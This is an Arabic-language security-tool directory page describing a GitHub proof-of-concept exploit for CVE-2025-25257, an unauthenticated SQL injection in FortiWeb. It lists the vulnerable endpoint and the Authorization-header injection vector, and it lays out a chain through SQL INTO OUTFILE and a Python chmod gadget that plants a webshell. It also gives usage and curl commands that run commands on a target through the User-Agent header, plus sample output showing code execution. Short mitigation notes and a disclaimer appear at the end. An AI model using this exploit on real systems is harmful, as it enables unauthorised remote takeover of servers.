Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-25257 — إثبات المفهوم (PoC) لـ CVE-2025-25257، وهي ثغرة حقن SQL حرجة غير موثقة في FortiWeb. يستغل حقن SQL عبر رأس Authorization لكتابة شيل ويب والحصول على تحكم عن بعد (RCE). لا يتطلب تسجيل دخول. آلي بالكامل. | Kitploit
أدوات/GitHubGitHub/0xgh057r3c0n/cve-2025-25257
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHub0xgh057r3c0n/cve-2025-25257

CVE-2025-25257

إثبات المفهوم (PoC) لـ CVE-2025-25257، وهي ثغرة حقن SQL حرجة غير موثقة في FortiWeb. يستغل حقن SQL عبر رأس Authorization لكتابة شيل ويب والحصول على تحكم عن بعد (RCE). لا يتطلب تسجيل دخول. آلي بالكامل.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2025-25257 – SQLi في FortiWeb إلى RCE

حقن SQL حرج → تنفيذ Webshell

اكتشف وسلح بواسطة 0xgh057r3c0n


🧠 نظرة عامة على الثغرة

CVE-2025-25257 يؤثر على أنظمة FortiWeb التي تعرض نقطة النهاية /api/fabric/device/status، والتي تفشل في تعقيم إدخال رأس Authorization بشكل صحيح.

يمكن للمهاجم تنفيذ حقن SQL غير مصادق عليه لكتابة webshell على الخادم وتنفيذ الأوامر عن بعد.


💥 تدفق الهجوم

root@kitploit:~
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE

📍 نقطة النهاية المعرضة للخطر

root@kitploit:~
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>

🔓 ميزات الاستغلال

  • SQLi عبر رمز Bearer
  • INTO OUTFILE الخاص بـ SQL لإسقاط الشل
  • خطاف Python يقوم بتشغيل chmod
  • تنفيذ الأوامر عبر User-Agent
  • إثبات مفهوم مؤتمت بالكامل

🧪 الاستخدام

root@kitploit:~
python3 CVE-2025-25257.py -t https://target-host.com

ثم:

root@kitploit:~
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi

🔧 المتطلبات

  • Python 3.6+
  • وحدة requests

التثبيت:

root@kitploit:~
pip install requests

📤 نموذج الإخراج

root@kitploit:~
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)

[+] Webshell Ready:
    > https://target-host.com/cgi-bin/x.cgi
    > Send commands via User-Agent header

📊 تقدير CVSS

المقياسالقيمة
النتيجة الأساسية9.8 (حرج)
متجه الهجومشبكة
الامتيازات المطلوبةلا شيء
تفاعل المستخدملا شيء

🛡️ التخفيف

  • تحديث برنامج FortiWeb الثابت (في حال توفر التصحيح)
  • تعقيم جميع مدخلات الرؤوس
  • تقييد مسارات كتابة الملفات وتنفيذ CGI

👨‍💻 المؤلف

0xgh057r3c0n 🔗 github.com/0xgh057r3c0n


⚠️ إخلاء المسؤولية

إثبات المفهوم هذا مخصص للاختبار التعليمي والمصرح به فقط. استخدمه على مسؤوليتك الخاصة. المؤلف غير مسؤول عن سوء الاستخدام.


تنزيل الأداة
التأثيرعالي (C/I/A)